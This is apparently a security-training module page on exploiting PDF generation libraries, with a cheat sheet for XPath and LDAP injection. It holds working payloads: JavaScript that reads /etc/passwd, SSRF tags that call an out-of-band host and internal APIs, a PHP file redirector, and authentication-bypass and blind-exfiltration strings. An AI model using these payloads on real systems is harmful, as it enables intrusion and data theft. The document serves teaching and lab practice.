Injection Attacks

Exploitation of PDF Generation Vulnerabilities

After discussing how and why web applications use PDF generation libraries, let us discuss how to exploit the vulnerabilities that arise in them and the misconfigurations that cause these vulnerabilities. All of these vulnerabilities require that user-provided content is inserted into the HTML input of the PDF generator.

JavaScript Code Execution

The first exploit we will explore is the injection of JavaScript code, since the execution of injected JavaScript code enables further attack vectors. Because the PDF generation library renders HTML input, it might execute our injected JavaScript code. Furthermore, with the PDF generation library running on the server, the payload would also be executed on the server, which is why this type of vulnerability is also called Server-Side XSS.

To demonstrate Server-Side XSS, let us take a look at a sample note-taking web application:

By clicking on the printer icon, the web application generates a printable PDF containing all our notes:

Since all the attack requires is the ability to inject HTML code, we will test whether the PDF generation library interprets the HTML code we provide. First, we will create a new note with a simple bold tag that contains our HTML payload:

Since the web application correctly escapes the HTML payload, the text between the tags has not become bold. Thus, the web application is secure against classical XSS attacks. However, if we generate a PDF, we can see that the text between the tags has become bold in the note's body, indicating that the PDF generation library is vulnerable to HTML injection and potentially Server-Side XSS:

In the second step, we need to verify whether the server executes injected JavaScript code. We can use a payload similar to the following:

<script>document.write('test1')</script>

After generating a PDF, we can see the string test1 in the PDF. Thus, the backend executed our injected JavaScript code and wrote the string to the DOM before generating the PDF.

As a simple first exploit, let us force an information disclosure that leaks a path on the web server. We can do so with the following payload:

<script>document.write(window.location)</script>

The window.location property stores the current location of the JavaScript context. Since this is a local file on the server's filesystem, it displays the local path on the server where generated PDF files are stored:

The execution of JavaScript can lead to further and more severe vulnerabilities, which we will discuss in the following sub-sections.

Server-Side Request Forgery

One of the most common vulnerabilities in combination with PDF generation is Server-Side Request Forgery (SSRF). Since HTML documents commonly load resources such as stylesheets or images from external sources, displaying an HTML document inherently requires the server to send requests to these external sources to fetch them. Since we can inject arbitrary HTML code into the PDF generator's input, we can force the server to send such a GET request to any URL we choose, including internal web applications.

We can inject many different HTML tags to force the server to send an HTTP request. For instance, we can inject an image tag pointing to a URL under our control to confirm SSRF. As an example, we are going to use the img tag with a domain from Interactsh:

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>

Similarly, we can also inject a stylesheet using the link tag:

<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2" >

Generally, for images and stylesheets, the response is not displayed in the generated PDF such that we have a blind SSRF vulnerability which restricts our ability to exploit it. However, depending on the (mis-)configuration of the PDF generation library, we can inject other HTML elements that can trigger a request and make the server display the response. An example of this is an iframe:

<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Injecting the three payloads and generating a PDF results in three requests to our Interactsh domains, such that we successfully confirmed SSRF with all three payloads:

Furthermore, looking at the generated PDF, we can see that the injected iframe contains the HTTP response sent by Interactsh:

Thus, we do not have a blind SSRF vulnerability but a regular SSRF, which is significantly more severe as it allows us to exfiltrate data more easily. For instance, we can make a request to any internal endpoint, and get the response displayed to us. As an example, we can leak data from an internal API like so:

<iframe src="http://127.0.0.1:8080/api/users" width="800" height="500"></iframe>

The generated PDF contains the response from the internal API, potentially revealing sensitive information to us that we are unable to access externally:

For more details on SSRF exploitation, check out the Server-side Attacks module.

Local File Inclusion

Another powerful vulnerability we can potentially exploit with the help of PDF generation libraries is Local File Inclusion (LFI). There are multiple HTML elements we can try to inject to read local files on the server.

With JavaScript Execution

If the server executes our injected JavaScript, we can read local files using XmlHttpRequests and the file protocol, resulting in a payload similar to the following:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Injecting this JavaScript code, we can see the content of the passwd file in the generated PDF:

However, this is impractical for some files since copying data out of the PDF file might break it. For instance, the syntax most likely breaks if we exfiltrate an SSH key. Additionally, we cannot exfiltrate files containing binary data this way. Thus, we should base64-encode the file using the btoa function before writing it to the PDF:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(btoa(this.responseText))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

However, doing so creates a single long line that does not fit onto the PDF page. Typically, the PDF generation library will not inject linebreaks, resulting in the line being truncated before the end of the page:

We can easily modify our payload to inject linebreaks every 100 characters to ensure that it fits on the PDF page:

<script>
	function addNewlines(str) {
		var result = '';
		while (str.length > 0) {
		    result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewlines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

After doing so, we can finally retrieve the file without issues. We can now copy the base64-encoded data and decode it using any tool that ignores the linebreaks in the base64-encoded input, such as CyberChef:

Without JavaScript Execution

If the backend does not execute our injected JavaScript code, we must use other HTML tags to display local files. We can try the following payloads:

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

However, doing so in our test environment only displays an empty iframe:

Fortunately, there is one more trick we can do in combination with iframes. As discussed previously in the SSRF section, some PDF generation libraries display the response to requests in iframes. However, as we can see in the screenshot above, sometimes, we cannot use iframes to access files directly. Nevertheless, we can use an src attribute that points to a server under our control and redirects incoming requests to a local file. If the library is misconfigured, it may then display the file. We can run the following PHP script on our server to do so. The script responds to all incoming requests with an HTTP 302 redirect by setting the Location header to a local file using the file protocol:

<?php header('Location: file://' . $_GET['url']); ?>

We can then inject the following payload, where the IP points to the server we are running the redirector script on:

<iframe src="http://172.17.0.1:8000/redirector.php?url=%2fetc%2fpasswd" width="800" height="500"></iframe>

After doing so, the generated PDF now contains the leaked file:

For more details on LFI exploitation, check out the File Inclusion module.

Annotations

While we have already discussed how to include local files in the PDF pages, PDF files support advanced features like annotations and attachments, which we can also use to leak local files on the server. This is particularly interesting if the previously discussed payloads do not work.

For example, consider the PDF generation library mPDF, which supports annotations via the <annotations> tag. We can use annotations to append files to the generated PDF file by injecting a payload like the following:

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Looking at the generated PDF file, we can see the annotation with the attached file. Clicking on the attachment reveals the attached /etc/passwd file:

As we can see in this GitHub Issue, annotations have been disabled after mPDF 6.0. Thus, web applications using an outdated version of mPDF are most likely vulnerable to this. The option can still be enabled in newer versions of mPDF. Thus it is also worth testing web applications using up-to-date mPDF versions.

Another PDF generation library that supports attachments is PD4ML. We can check the syntax in the documentation. As a proof-of-concept, we can use the following payload:

<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>

Again, if we look at the generated PDF file, we can see the annotation with the attached file:

Like before, the file is revealed if we click on the annotation. As we can see, it is essential to read the documentation of the specific PDF generation library used by our target web application to see if we can identify any functionality we can potentially exploit. Custom tags like pd4ml:attachment that enable access to local files are particularly interesting.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 7 Try to use what you learned in this section to access an internal web application and exfiltrate the flag.

+10 Streak pts

Previous Next

Go to Questions

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />